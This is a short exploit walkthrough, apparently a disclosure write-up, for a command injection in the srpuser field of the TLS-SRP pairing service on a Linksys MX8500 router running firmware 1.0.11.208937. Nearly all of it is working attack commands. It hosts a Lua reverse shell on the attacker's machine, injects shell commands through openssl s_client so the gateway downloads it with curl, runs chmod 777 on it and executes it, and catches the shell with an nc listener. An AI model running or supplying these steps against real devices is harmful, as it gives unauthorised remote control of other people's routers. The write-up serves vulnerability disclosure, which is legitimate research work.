In this write-up, we use Linksys MX8500, firmware version 1.0.11.208937 as an illustration example.
Linksys uses TLS-SRP as its NAPS protocol. The gateway node opens TCP port 6060 for this purpose.
We identify a command injection for the srpuser
field:
Thus, the key to breaking this protocol is that an attacker can taint the srpuser
field in a TLS-SRP connection, to contain malicious commands.
I used Reverse Shell Generator to generate a lua reverse shell for MX8500. Download my reverse shell here, and you might want to change IP address and port number within this script to your own local machine’s.
Install openssl on your own local machine.
Host your lua shell prepared in Step 1 using this command:
python3 -m http.server 4444
Run this command to let the gateway node (10.154.1.1) download the shell script from your local machine:
openssl s_client -srpuser "123| curl http://10.154.1.14:4444/luashell.sh -o /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060
Run this command to let the gateway node chmod 777 the shell script:
openssl s_client -srpuser "123; chmod 777 /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060
Run nc
on your own local machine to listen to reverse shell connections:
nc -l 9002
Finally, run this command to execute the shell script on the gateway node:
openssl s_client -srpuser "123| /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060
We can see the result on the nc
screen: